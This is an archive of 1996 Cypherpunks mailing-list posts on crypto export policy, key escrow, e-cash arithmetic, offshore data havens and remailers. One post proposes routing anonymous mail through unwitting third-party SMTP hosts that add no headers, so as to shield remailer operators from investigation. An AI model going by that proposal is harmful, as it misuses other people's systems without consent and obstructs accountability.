Subject: RE: The Anti-Briefing...
Message-ID: <01BB4970.70BB2BA0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Peter Wayner

[......]The fact is
that government enforced weak crypto is a tradeoff. We pay for
the ease of the police surveillance because we make life simpler
for crooks who make their living eavesdropping and circumventing
security systems. The big question is whether the tradeoff is
worth it.
...............................................................

"Government enforced weakness":  They try to do good for the benefit of all by reducing the individual's personal efficacy, until the nation is transformed into a mass of whining weanies.  Like sitting ducks, everyone is then in the position of being totally vulnerable to corrupt government administrators.  I wouldn't think that being of no practical use to oneself would be a valuable tradeoff, given such a (frequently recurring) potentiality.

If they really wanted the nation to be strong and secure, they would actively take up the task of providing "government assisted strength", advising us on how to protect ourselves, our property, our email....perhaps evern receiving "The Briefing", so that we could all be prepared to resist (or assist in resisting) threats from pervs and terrorists, et al.

(this "Briefing" reminds me of Atlas Shrugged, but in the opposite direction -  where instead of the targets becoming enlightened, their minds become closed.)

     ..
Blanc








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 25 May 1996 10:05:46 +0800
To: Simon Spero <minow@apple.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605242004.NAA12841@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 PM 5/24/96 -0400, Simon Spero wrote:

>Libyan embassies don't get bombed. They just have thugs shooting unarmed 
>WPCs from them under protection of diplomatic immunity (I used to live in 
>Pimlico, and went to college in South Kensington, and going past the 
>Yvonne Fletcher memorial always got me upset
>
>Anyway, they're not just state sponsored terrorists, they're the actual 
>terrorist state, and can thus can easily get access to whatever 
>crypto they want; in extrimis shipping OTPs by diplomatic pouch; it's the 
>smaller, unofficial groups where the case is most easily made.

If the Libyans are so bad (and they probably are) then why shouldn't the 
public in other countries be entitled to pool their contributions and take 
their government down?   (okay, this is a rhetorical question...)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 25 May 1996 11:39:31 +0800
To: cypherpunks@toad.com
Subject: Re: Floating Point and Financial Software
Message-ID: <199605242014.NAA17367@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Did that earlier posting really mean Digicash code uses 16-bit quantities
for moving money around?  Yow!  The API says 32 bits.

32 bits isn't enough precision; 64 bits is almost always enough.
Floating point gives you about 53 bits, which is usually enough,
but it fails badly for accounting.  The problem is that the amount
of precision in a floating-point calculation depends on the
magnitude of the numbers, so A+D and B-D may have different roundoff errors,
which is a Very Bad Thing when you're trying to move $D from A to B.
Floating point is fine for deciding how much money to move,
but you have to move the same amount in each calculation.

Otherwise, if there's no clever salami-attack programmer siphoning off the
roundoff error, little half-bits of salami get created or destroyed
on every transaction, leaving a random-walk amount of spam or anti-spam 
splattered all over the accounting system, which is Not Good.
And, of course, translating fractional decimal numbers of dollars
into floating-point binary creates another roundoff spam event,
while fixed-point systems would just use pennies or mills or microbucks
and operate integrally, only doing roundoff for multiplications
such as interest-rate calculation or /12s where you're deciding how
much money to move from account to account.*

Currency conversion is a good example - floating point may give you
the most accurate number of dollars to move for a transaction of
some integral number of yen, ecus, or zorkmids, which will generally
be non-integral.  Suppose Alice and Bob have ECU-denominated accounts,
and Alice pays Bob 1 dollar, or ECU 1/1.2299=0.8130742336775 **.
If Alice's account has, say, 3.1459265 million dollars' worth of ECUs,
and Bob's has 2.718128459045 ECUs, it's easy to lose 4.6566e-10 ECUS in
the transaction, and probably more if you didn't have decimal conversions.

64-bit integers let you use, say, millionths of a cent as your currency,
with values up to +/- 8 trillion, which will handle the US Federal Debt for
another couple of years, though more bits let you use the same code for
anything from micropayment to hyperinflated currencies.

One motivation for floating-point is historical computer power limits:
bignum arithmetics on 8086s takes lots of work, especially in languages
like Pascal or BASIC without abstract data types, and it's slow,
while the 8087 chip was far faster, and handled big enough chunks of
money for almost anybody who was doing their accounting on a PC
instead of a Mainframe.

[*My paycheck at AT&T often includes an Annual Penny Adjustment at the
end of the year to correct for the monthly payments for salaries that
aren't divisible by 3....]

[** ECU value from WSJ May 13.  Ukrainian Karbovanets were 183300/dollar.]




#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 25 May 1996 11:27:03 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <9605241714.AA04977@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


Right, someone tells your wife that you are sleeping with someone else.
The truth, does it hurt? (-:

	-paul

> From cypherpunks-errors@toad.com Thu May 23 23:20:18 1996
> X-Sender: sandfort@popmail.crl.com
> X-Mailer: Windows Eudora Pro Version 2.2 (32)
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Thu, 23 May 1996 13:06:15 -0700
> To: jim bell <jimbell@pacifier.com>
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace 
> Cc: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Content-Length: 396
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                        SANDY SANDFORT
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> At 12:11 PM 5/23/96 -0800, jim bell wrote:
> 
> >Tell ya what: name a weapon that CANNOT be used to harm an 
> >innocent person.  Go ahead, I'm waiting.
> 
> The Truth?
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 25 May 1996 14:38:59 +0800
To: cypherpunks@toad.com
Subject: Re: Announcing CryptaPix 1.0
Message-ID: <9605241820.AA25279@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain




> From: KDBriggs1@aol.com
> Date: Fri, 24 May 1996 13:05:32 -0400
> Subject: Announcing CryptaPix 1.0
>
> 
> FOR IMMEDIATE RELEASE                         Information Contact:
> 
> May 24, 1996                                  Kent Briggs
>                                               kbriggs@execpc.com
>                                               CIS: 72124,3234
> 
> 
>            NEW GRAPHICS VIEWER FOR WINDOWS RELEASED
> 
> Hewitt, Texas - Kent Briggs, author of Puffer, One-Page Calendar,
> File Maven, and Directory Maven, has announced the release of
> CryptaPix 1.0.  Available in both 16-bit and 32-bit editions,
> CryptaPix is a general purpose image viewer for GIF, JPG, PNG,
> PCX, TIF, and BMP graphics files.
> 
> What sets CryptaPix apart from ordinary viewers is its secure
> encryption feature utilizing the same technology found in Puffer
> 2.0. The encryption feature prevents unauthorized use of your
> personal image collection by requiring a password for access.
> Images are decrypted directly into memory for viewing.  A secure
> wipe feature will permanently remove unwanted images from your
> disk drive.
> 
[...more stuff deleted...]

Expect to be hearing about this being a problem 
with some child porn case real soon now... <sigh>

However - I can see this becoming VERY popular with the 
teenage crowd wanting to keep mom & dad out of their stash ;-)

That being said - Thumbs up to Kent for another crypto program 
that pushes the "genie" even farther out of the bottle.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 09:50:03 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: ecash representation
In-Reply-To: <Pine.SUN.3.93.960524112822.657B-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.93.960524132735.657S-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Black Unicorn wrote:

[...]

> Do you have a fact sheet on Piermont I might give to him?
> 
> He could be in a position to generate significant business for a
> consulting firm which really knew the ins and outs of strong encryption.
> 
> I'd also be interested for my own reasons.

This was not meant to go to the list, sorry everyone.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 25 May 1996 13:52:24 +0800
To: Declan McCullagh <cp@panix.com>
Subject: Re: Anarchy Online
In-Reply-To: <Pine.3.89.9605241244.A21325-0100000@well>
Message-ID: <Pine.GUL.3.93.960524131950.29645M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Declan McCullagh wrote:

> > Yeah, you'd mentioned it, but I hadn't read it until just now. I see he
> > mentions me on http://anarchy-online.dementia.org/book/section.2.html, but
> > my name is badly misspelled; it starts with "R," not "D." Donna's name is
> > badly misspelled, too, early on. 
> > 
> > I wholeheartedly support his conclusions, by the way. They're based on
> > a number of incorrect premises, but any fictions are convenient ones. 
> > 
> > http://www.stanford.edu/~ajg/project.html
> > http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html
>
> A shame that Charles didn't give you all the credit you so rightfully
> deserve. Holocaust fetishists need all the press they can get. :)
> 
> Perhaps he thinks you're a net.loon -- I do suggest you ask him! 

Oh, I have no doubt that he believes everything you tell him. So, Charles,
do you think I'm a net.loon, and why? Please reply publicly on
cypherpunks. I'd like E. Allen Smith and Jim Bell to read this.

Declan, I sincerely apologize by "avoiding" you by going to a long-
scheduled DHCP implementation meeting with Rob Riepel and Roger Avedon
rather than taking your one call.  As I told you, again, yesterday, my
alphanumeric pager can be reached via rich@beep.stanford.edu (80
characters from the Subject: line), and I'd be happy to talk to you at any
convenient time outside working hours.

-rich
 moderator, comp.os.ms-windows.announce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 25 May 1996 12:01:54 +0800
To: cypherpunks@toad.com
Subject: Re: Anarchy Online
In-Reply-To: <Pine.GUL.3.93.960524131950.29645M-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9605241335.A24503-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Rich Graves wrote:

> Oh, I have no doubt that he believes everything you tell him.

I have enough respect for Charles to say that he probably doesn't believe 
everything *anyone* tells him, including me.

-Declan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Sat, 25 May 1996 13:00:24 +0800
To: farber@cis.upenn.edu
Subject: Please Post Widely -- The NRC Cryptography Policy Report
Message-ID: <9604248329.AA832976724@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain



     To whom it may concern:

     The Computer Science and Telecommunications Board (CSTB) of the
     National Research Council (NRC) has completed a congressionally
     mandated study of national cryptography policy.  The final report, 
     Cryptography's Role in Securing the Information Society, will be
     released to the public on May 30, 1996 at a public briefing.  A large
     number of the authoring committee members will attend.

     The public briefing will take place in the Main Lounge of the National
     Press Club, 14th and F Streets, N.W., Washington, D.C., from 1:00 PM
     to 3:00 PM, on Thursday, May 30, 1996. Committee members will respond
     to questions from attendees, and a limited number of pre-publication
     copies of the report will be available at that time.  By the close of
     business on May 30, a summary of the report will be made available
     through http://www2.nas.edu/cstbweb; the full publication will be made
     available when final printed copies of the book are available
     (probably around the beginning of August).

     The committee also intends to conduct a second public briefing on the
     report in
     Menlo Park, California at SRI International.  The briefing will be
     held in the Auditorium of the International Building from 10 to 11 am
     on  Wednesday, June.5.  The address is 333 Ravenswood Avenue, Menlo
     Park, California, 94025.  For more information about the briefing at
     SRI, contact Alice Galloway at 415-859-2711
     (alice_galloway@qm.sri.com).

     If you have suggestions about other places that the committee should
     offer a public briefing, please let me know (crypto@nas.edu or
     202-334-2605).

     If you wish to be kept informed of various other public activities
     regarding dissemination of this report, you can sign up for an e-mail
     list by visiting the web page
     http://www2.nas.edu/cstbweb/notifyme.html.

     I apologize to you for the short notice on this invitation, but hope
     that you will be able to attend.

                       Herb Lin
                       Senior Staff Officer
                       Study Director
                       CSTB/NRC Study of National Cryptography Policy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 25 May 1996 09:51:44 +0800
To: cypherpunks@toad.com
Subject: Truth is equivalent to law?
Message-ID: <199605242031.PAA24301@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi blanc,


Forwarded message:

> From: blanc <blancw@accessone.com>
> Subject: RE: Truth can sometimes be harmful...(talk.cpunks.truth)
> Date: Fri, 24 May 1996 12:24:23 -0700

> I understood what you meant.   I appreciate the general nature of truth, =
> in spite of the possibilities for misinterpretations of or =
> prevarications from it.=20

What is the 'general nature of truth'?

> Jim, a quote for you:
> 
> 	"We are able to act at all - that is to say, we have the power=20
> 	to order our conduct in such a way that the ends we desire=20
> 	can be attained - only because the phenomena of the world=20
> 	are governed not by arbitrariness, but by laws that we have=20
> 	the capacity to know something about.  If it were otherwise,=20
> 	we should be completely at the mercy of forces that we should=20
> 	be unable to understand."=20
> 				~ Human Action, Ludwig Von Mises
> 
> Substitute the word "truth" for "laws" and it makes equal sense.  We =
> would be at the mercy of forces that we could not control, if our =
> perceptions and interpretations could not correspond to the actual, the =
> real, the truth.

So in your mind truth is equivalent to law? In the sense of the above quote
the 'laws' that are refered to are general observed regularities that we
are capable of understanding. Being a pantheist and hence seeing the entire
cosmos as all there is (and hence divine in toto), I can appreciate the
original intent (being a physicist helps a little bit).

If I accept your equivalency (which I do) then there is no such thing as
Truth in the sense of the original discussion. The laws refered to in the
quote have the implicit characteristic of being disproved. A characteristic
not shared by Truth.

I further believe the universe is understandable, just not in toto. It is a
little simplistic to believe that every system in the cosmos uses all the
regularities that we observe. When followed to its logical conclusion  it
implies that there may (are) systems which we won't be able to understand
in toto (quantum effects come to mind) simply because the system that is
our brain either is not complex enough or runs into the Godel paradox.
In short, if we assume that we can understand the universe in toto then we
have in effect demonstrated that Godel was incorrect. I have covered the
ramifications of this previously.


Crypto relevancy: many assumptions that we take for granted are based upon
                  proof and 'laws' we ASSUME to be isotropic and 
                  homogeneous. If we don't have a clear and present
                  understanding of the 'laws', the procedures used to obtain
                  them, and the limitations  of both our 'laws' and the 
                  procedures, then we are opening ourselves up for a large
                  dose of security by obscurity.

Always question authority, it is simply another human being who does not have 
your best interest at heart since they have their own agenda.


                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herodotus@alpha.c2.org
Date: Sat, 25 May 1996 12:35:21 +0800
To: cypherpunks@toad.com
Subject: SSL Telnet Proxy?
Message-ID: <199605242231.PAA12375@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a publically available telnet proxy, preferably
one using SSL?

--
Herodotus <herodotus@alpha.c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 12:36:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Layman's explanation for limits on escrowed encryption ...
In-Reply-To: <199605241914.MAA10326@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960524153121.7840E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, jim bell wrote:

> At 11:47 AM 5/24/96 -0400, Black Unicorn wrote:
> >On Wed, 22 May 1996, Ernest Hua wrote:
> >
> >> Could someone with some knowledge of NSA/DoS/FBI intentions please
> >> explain why key length limitations are necessary for escrowed
> >> encryption?
> >
> >To deal with the possibility that someone might slip through the cracks of
> >the escrow process.
> 
> However, this escrow process is claimed to be _voluntary._  And good, 
> non-escrowed encryption already exists today, outside the US.  It won't be 
> "slipping through the cracks," it'll be like opening the floodgates.  So the 
> question is still open:  Why key-length limitations on export?

I never said it was a reasonable explanation, I said it was an
explanation.  He asked about TLA intentions, not my views.

Really, and when you look at these things in the context of the Clipper
like plans, i.e. setting the defacto standard and chilling the development
of unescrowed strong crypto, it covers the bases nicely.

The assumption that needs to be looked at is that a standard setting plan
will actually shape the market.

> 
> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Sat, 25 May 1996 11:45:11 +0800
To: crypto@nas.edu
Subject: Re: the NRC report on National Cryptography Policy
Message-ID: <9604248329.AA832977773@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


     Please post widely.

     To whom it may concern:

     The Computer Science and Telecommunications Board (CSTB) of the
     National Research Council (NRC) has completed a congressionally
     mandated study of national cryptography policy.  The final report,
     Cryptography's Role in Securing the Information Society, will be
     released to the public on May 30, 1996 at a public briefing.  A large
     number of the authoring committee members will attend.

     The public briefing will take place in the Main Lounge of the National
     Press Club, 14th and F Streets, N.W., Washington, D.C., from 1:00 PM
     to 3:00 PM, on Thursday, May 30, 1996. Committee members will respond
     to questions from attendees, and a limited number of pre-publication
     copies of the report will be available at that time.  By the close of
     business on May 30, a summary of the report will be made available
     through http://www2.nas.edu/cstbweb; the full publication will be made
     available when final printed copies of the book are available
     (probably around the beginning of August).

     The committee also intends to conduct a second public briefing on the
     report in
     Menlo Park, California at SRI International.  The briefing will be
     held in the Auditorium of the International Building from 10 to 11 am
     on  Wednesday, June.5.  The address is 333 Ravenswood Avenue, Menlo
     Park, California, 94025.  For more information about the briefing at
     SRI, contact Alice Galloway at 415-859-2711
     (alice_galloway@qm.sri.com).

     If you have suggestions about other places that the committee should
     offer a public briefing, please let me know (crypto@nas.edu or
     202-334-2605).

     If you wish to be kept informed of various other public activities
     regarding dissemination of this report, you can sign up for an e-mail
     list by visiting the web page
     http://www2.nas.edu/cstbweb/notifyme.html.

     I apologize to you for the short notice on this invitation, but hope
     that you will be able to attend.

                       Herb Lin
                       Senior Staff Officer
                       Study Director
                       CSTB/NRC Study of National Cryptography Policy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 25 May 1996 11:16:12 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Children's Privacy Act
In-Reply-To: <adcb2a8e0002100415b1@[205.199.118.202]>
Message-ID: <Pine.GUL.3.93.960524154831.29645Z-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Timothy C. May wrote:

> At 6:45 AM 5/24/96, Rich Graves wrote:
> >I was certainly disappointed to hear a couple of cypherpunks the other day
> >discussing for-profit offshore data havens full of personal information
> >that is illegal to collect in the US as a business opportunity *they* were
> >interested in pursuing. I just can't see myself doing that, for anybody.
> >Gubmint or private, doesn't matter.
> 
> These off-shore data havens, possibly in Anguilla, possibly elsewhere, have
> long been a motivation for crypto anarchy.

Yes, but is it a motivation to do "good" or "evil"? Maybe this belongs on
PHILOSOPHYpunks. 

Who would control the offshore data havens? What would they have on me? I
am well aware of what TRW et al can do, but at least in theory (cough),
they're legally accountable (cough). 

I know you disagree, but I'm a big fan of statutes of limitations and the
firewalling of unrelated issues. Someone went bankrupt or beat her husband
seven years ago (or whatever), I don't want to know about it. I'd rather
ten (configurable) guilty men go free than one innocent man get punished.
These are artificial boundaries, yes, but they're boundaries within which
I'm comfortable living.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Sat, 25 May 1996 10:08:58 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <2.2.32.19960523200615.0072a288@popmail.crl.com>
Message-ID: <doug-9604242116.AA00735417@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>
>At 12:11 PM 5/23/96 -0800, jim bell wrote:
>
>>Tell ya what: name a weapon that CANNOT be used to harm an 
>>innocent person.  Go ahead, I'm waiting.
>
>The Truth?
>
>
> S a n d y


Bravo!!!! Game set match!

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 25 May 1996 10:00:03 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Truth can sometimes be harmful...(talk.cpunks.truth)
In-Reply-To: <01BB496C.7E658A60@blancw.accessone.com>
Message-ID: <v03006602adcbcbad3559@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:24 PM  -0400 5/24/96, blanc wrote:
> 	"We are able to act at all - that is to say, we have the power
> 	to order our conduct in such a way that the ends we desire
> 	can be attained - only because the phenomena of the world
> 	are governed not by arbitrariness, but by laws that we have
> 	the capacity to know something about.  If it were otherwise,
> 	we should be completely at the mercy of forces that we should
> 	be unable to understand."
> 				~ Human Action, Ludwig Von Mises
>
Or, the terse version, from my old .sig:

"Reality is not optional"
                   -- Thomas Sowell

;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 25 May 1996 13:45:55 +0800
To: middle-man-admin@alpha.c2.org
Subject: Re: middleman remailer available on hacktic
In-Reply-To: <199605241955.VAA24531@basement.replay.com>
Message-ID: <Pine.NEB.3.93.960524165328.17730A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 24 May 1996, Flame Remailer wrote:

> 	The middleman remailer software is now available for download. The
> file middleman.tar.gz can be found on ftp.hacktic.nl in
> /pub/replay/pub/incoming and /pub/replay/pub/remailer. Installation
> instructions are included. 

	I FTP'ed middleman from hacktic and have placed it in the noexport
directory on the anonymous FTP site at ftp.jpunix.com. Since it contains a
copy of Mixmaster with the crypto-code intact, the instructions for
downloading mixmaster also apply to middleman. You can find it in the same
hidden directory as mixmaster.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaYwmFOTpEThrthvAQE0AgP/Rptxa5tO4g+WE7arfek12fKnrSjCj20u
/f+a/fhjetQrbJ/FCRMYewBdpLtuC+2Qywx8+LTQXPG0fd/4cSwHTDfpcTntoxjp
rU76lvJYOWHZUXjaTCaHe9JD89PI71UIRCiPfDOPEXJaQjyiwDosivNUG9jI0OUG
MpGGAJLb+y8=
=q4uL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 25 May 1996 13:55:00 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
In-Reply-To: <Pine.GUL.3.93.960524154831.29645Z-100000@Networking.Stanford.EDU>
Message-ID: <199605250000.RAA11921@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> writes:
>Who would control the offshore data havens? What would they have on me? I
>am well aware of what TRW et al can do, but at least in theory (cough),
>they're legally accountable (cough). 

>I know you disagree, but I'm a big fan of statutes of limitations and the
>firewalling of unrelated issues. Someone went bankrupt or beat her husband
>seven years ago (or whatever), I don't want to know about it. I'd rather
>ten (configurable) guilty men go free than one innocent man get punished.
>These are artificial boundaries, yes, but they're boundaries within which
>I'm comfortable living.

I think the reason (some) cypherpunks support things like offshore data
havens isn't that they think it's great to reduce the amount of privacy
people have.  Why would they support crypto and such if that were their
motivation?  The real reason is because we expect that such databases are
going to come into existence regardless of legal efforts.  They may be
"underground", or for that matter they may be run by governments
themselves, whom we are supposed to trust with our secrets.

The point is that the best countermeasure is to prevent the collection of
the data in the first place.  Ecash is better than credit cards for this
reason.  People should try to structure their lives so that as little
information is leaked about them as possible.  Relying on laws forbidding
people to keep information they have run across isn't likely to be
effective.

Now maybe the laws, while not perfect, can still at least reduce the
amount of this dataveillance.  The problem is, this is likely to lead
to a false sense of security, where people don't bother to protect
their own privacy because big brother is doing it for them.  We would
rather have these real privacy threats be right out in the open where
people can see them.

In a way, our position is like those revolutionaries who are convinced
the government is evil, while the populace mindlessly goes along with
the status quo.  Terrorists inflict terror largely to force the
government to crack down, raising popular awareness of its oppressive
nature, and fostering revolutionary feelings.

This is not the cypherpunk goal (as I see it) but still we share the
same sense of seeing trouble that most people aren't aware of.
Supporting offshore data havens, while harmful to privacy in the short
term, might at least awaken people to the problem.  If that leads to
greater awareness of the need to directly control the release of
information about themselves, then in the long run it will be good.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 25 May 1996 14:32:45 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <adcba255040210043a4e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 5/24/96, Rich Graves wrote:

>Who would control the offshore data havens? What would they have on me? I
>am well aware of what TRW et al can do, but at least in theory (cough),
>they're legally accountable (cough).

Who would control them? Their owners, presumably.

What would they have on you? Depends on what you've done and what they can
learn.

>I know you disagree, but I'm a big fan of statutes of limitations and the
>firewalling of unrelated issues. Someone went bankrupt or beat her husband
>seven years ago (or whatever), I don't want to know about it. I'd rather

If you don't want to know about it, fine. Set your filters to ignore such
things.

But suppose *I* want to know?

(And there are "legitimate" reasons. Isn't it quite plausible for a woman
to be interested in whether her prospective husband is a wife-beater? Even
if the last incident occurred (or was publically reported, at least) more
than the 7-year (or whatever) period ago?)

In any case, there are public records, such as arrest records, court
transcripts, newspaper articles, and so on. To forbid me from using these
(to throw me in jail, ultimately, for this crime) is inconsistent with a
free society.

And technology is already finding ways to route around such laws. The stuff
we are involved with will shatter such laws completely.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@kermit.aatech.com
Date: Sat, 25 May 1996 13:40:46 +0800
Subject: Alternative to remailer shutdowns...
Message-ID: <19960524.1408058.1225D@kermit.aatech.com>
MIME-Version: 1.0
Content-Type: text/plain


    There are hundreds of machines littered around the net that
dont bother adding "received" headers to mail.

I dont think that these provide anything near the security and anonymity 
that a single remailer (much less a remailing chain) provide, but it 
seems to me that routing outbound traffic from a remailer through one of 
these sites would provide at least /some/ measure of protection for the 
remailer-operator.

It feels a bit underhanded, but it may be that involving some 
"innocent" bystanders in the remail process would be useful. 
Even if the sites being routed through /were/ keeping logs it would still 
require their participation in any investigation to discover where the 
mail had originated, and this would introduce the question of whether the 
(psuedo)anonymous sendmail host should bear any liability for not
tracking where mail came from. The operator of the particular 
smtp host would seem to have a pretty good defense should a charge be 
raised, but in defending the smtp-host you could also be strengthening 
the defense of the r-ops. 

Another possibility is that rather than operating remailers at all, maybe 
we should be operating non-logging smtp hosts that dont add received 
headers. Building a client to take advantage of these servers would be 
trivial (i wrote one last night, and i am not proficient in C) and it 
could be argued that the situation was not created intentionally to allow 
anonymous messages, merely to preserve disk space and bandwidth.

Flame Away... 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Platt <cp@panix.com>
Date: Sat, 25 May 1996 10:51:25 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Anarchy Online
In-Reply-To: <Pine.GUL.3.93.960524131950.29645M-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960524173225.12653D-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Rich Graves wrote:

> Oh, I have no doubt that he believes everything you tell him. So, Charles,
> do you think I'm a net.loon, and why? Please reply publicly on
> cypherpunks. I'd like E. Allen Smith and Jim Bell to read this.

Your wish is my command, but--who are they?

Actually Rich it took me a while to remember you. The Zundel affair didn't
loom large in my life (because I wasn't part of it, I guess). I assumed
you had long since moved on to more important matters.  I have no idea
whether you are a net.loon. But I am sorry if I misspelled your name in my
book, and indeed as soon as I get offline here, I'm going to do a word
search. We're making the text into pages right now, so the time is right. 

